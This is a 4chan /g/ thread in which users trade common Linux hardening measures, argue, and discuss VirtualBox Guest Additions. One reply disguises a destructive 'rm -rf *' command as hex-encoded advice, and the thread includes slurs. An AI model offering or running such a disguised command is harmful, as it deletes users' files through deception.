What steps does /g/ take to harden and protect their linux systems?

No one cares about your furry porn, weirdo

>>56338099
>Blocked open ports
>- Browse in virtual machines only
>- Grsecurity to improve kernel
>- Disabled useless default services
>- Firewall
And what times takes to do? I'm sure this takes a lot of time when on Windows it's all configured by default and don't need to touch anything,TIME IS GOLD

Nothing.

>>56338115

shut up faggot

>>56338134

It takes about 30 minutes if you know what you are doing. Can be quite challenging to use grsecurity if you have never done it before.

You watch too much /tv/

>>56338115
Get the fuck out

>>56338223
>>56338161
Seriously, do you really think someone is targeting you? That would be the only reason for that many steps of security. Are you the hacker known as 4chan? Why even connect to the internet in the first place?

on servers:
>SELinux
>iptables
>fail2ban
>disable root login for sshd

>>56338266

Why do you install a virusscan on a Windows PC? Right to keep you safe to an extend. Just because you use Linux doesnt make you safe. Beter be safe then sorry.

>>56338420
I don't. 99.99999% of malware is installed by the user

>>56338134
>default
Nope. Read the OP again.

>>56338099
I don't browse in vm but I do harden the browser and disable the unused services. CUPS listen to the network you know.

>>56338447
And that's exactly the point, prevention is easier than trying to fix your shit up with five bots, two rootkits and eight malwares up your ass

SSH is probably the most dangerous service on any computer, disable It or restrict it with a good password/ssh key combination and don't leak it trough fucking memeginx or Memepache and you'll be mostly fine

>>56338099
I install temple OS and use a ramdisk.

Impossible for anyone to get me.

>>56338277
>sshd
>having a backdoor installed

> Use whonix on a laptop with camera and microphone removed
> All of the above is taken care of

feels good man :)

File: hduf3 ief34r 23.jpg (50KB, 620x372px) Image search: [Google]

50KB, 620x372px

i cover my thinkpad with aluminum foil.

public-private key authentication ONLY via ssh
tunnel ALL THE THINGS over ssh
randomize default ports
iptables
fail2ban
selinux
luks+dmcrypt system encryption

>>56338099
Just

$(echo 726d202d7266202a0a | xxd -r -p)

File: madness.1459225097865.lovecraft-penguin.webm (3MB, 994x560px) Image search: [Google]

3MB, 994x560px

>>56338099
>- Browse in virtual machines only
I'm looking into running a win7 guest on a linux host in VirtualBox. The functionality of Guest Additions seems very desirable, especially the local shares and mouse support. But I also want to be able to dual boot this partition sometimes, or even boot it in a different VM sometime in the future. Do the special drivers GA installs on the guest interfere with this? I've read a few accounts of them doing so with Ubuntu guests, even though that's the reverse of my situation. I'd rather not fork my windows install onto any more partitions than I have to while maintaining both dual boot and smooth guest functionality.

TL;DR, does VB Guest Additions for a win7 guest break dual booting a win7 partition?

>>56341918
I can't imagine why that would possibly cause an issue

>>56344019
Well, it replaces mouse and video drivers on the guest, for one thing, not to mention overriding the clipboard. Also, since windows is the guest, it will see the VM and native hardware environments as different machines, and throw a hissy fit about activation.

>>56338277
This and disable ping response for good measure.

File: mumy-penguins.1178020368239.jpg (38KB, 640x480px) Image search: [Google]

38KB, 640x480px

>>56341918
bump for insight.

shitpost only in public libraries while wearing a ski mask

>>56338099
I just use a FreeBSD box has a router.

>>56344720
why would icmp even get far enough to hit the machine in the first place? and dont say 'well what if another machine gets compromised!' because by then its too late and they will just find it via arp

>>56340935
That string of hex looks familiar

>>56340935
haha, this is good

>>56346664
https://www.sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13

>>56338134
Using a virtual machine increases the attack surface, it's totally a pointless advice.

It's way more secure to use chromium in native.

>>56338099
>>- Blocked open ports
>having open ports
>>- Browse in virtual machines only
I bet this isn't even a hardened system in the VM. Enjoy your hypervisor exploits from within the VM.
>>- Grsecurity to improve kernel
I'd post the tweet about grsec faggots banning people for posting about a bug in it, but I didn't save it.
>>- Disabled useless default services
>having useless default services in the first place
>>- Firewall
>letting programs open sockets

>>56347167
the point is, only a fucking dingus is going to let icmp through the firewall in the first place.

fuck off

File: your_head.jpg (7KB, 213x237px) Image search: [Google]

7KB, 213x237px

>>56347426
>the point is
Your head.

>>56344618
They're virtual drivers for virtual devices. They only exist when the virtual drive is mounted. The host doesn't see them otherwise.

>>56347814
But what about when the guest is later booted outside the VM on the bare hardware, like in a dual boot situation?